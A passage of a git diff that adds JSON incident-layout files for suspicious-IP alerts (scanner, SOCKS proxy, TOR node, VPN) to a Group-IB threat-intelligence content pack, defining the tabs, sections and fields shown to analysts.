3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-201ec080-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "411bba90-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "43ee89a0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "46770940-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "49829b90-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-20be82f0-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "2fdc9920-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "32ed3480-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "3596d0b0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "38b74a90-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibscannercategories", + "height": 22, + "id": "3b6bbc30-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP Scanner Layout", + "name": "GIB Suspicious IP Scanner Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json new file mode 100644 index 000000000000..47fb964f7d17 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json @@ -0,0 +1,460 @@ +{ + "description": "Layout for GIB Suspicious IP Socks Proxy", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b7871630-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "d10397a0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "d4876730-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "d7649680-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "d9e2b5e0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b8235630-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "c3ae5a90-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "c62219b0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "c8f20290-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateofdetection", + "height": 22, + "id": "cb918ca0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibsocksproxysource", + "height": 22, + "id": "54e38600-861f-11ef-a9d2-eb62a95c9def", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "ce52cf80-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP Socks Proxy Layout", + "name": "GIB Suspicious IP Socks Proxy Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json new file mode 100644 index 000000000000..653a6f7fc096 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json @@ -0,0 +1,442 @@ +{ + "description": "Layout for GIB Suspicious IP TOR Node", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-3c7b4ce0-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "549fdf70-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "5b671a30-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "5e6231c0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "61c92a80-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-401367c0-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "4778de50-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "4a1b9cb0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "4cf23c50-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "4feeb370-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP TOR Node Layout", + "name": "GIB Suspicious IP TOR Node Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json new file mode 100644 index 000000000000..eabc4d5ed1a2 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json @@ -0,0 +1,460 @@ +{ + "description": "Layout for GIB Suspicious IP VPN", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-eac47510-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "089b4ff0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "0b4428d0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + 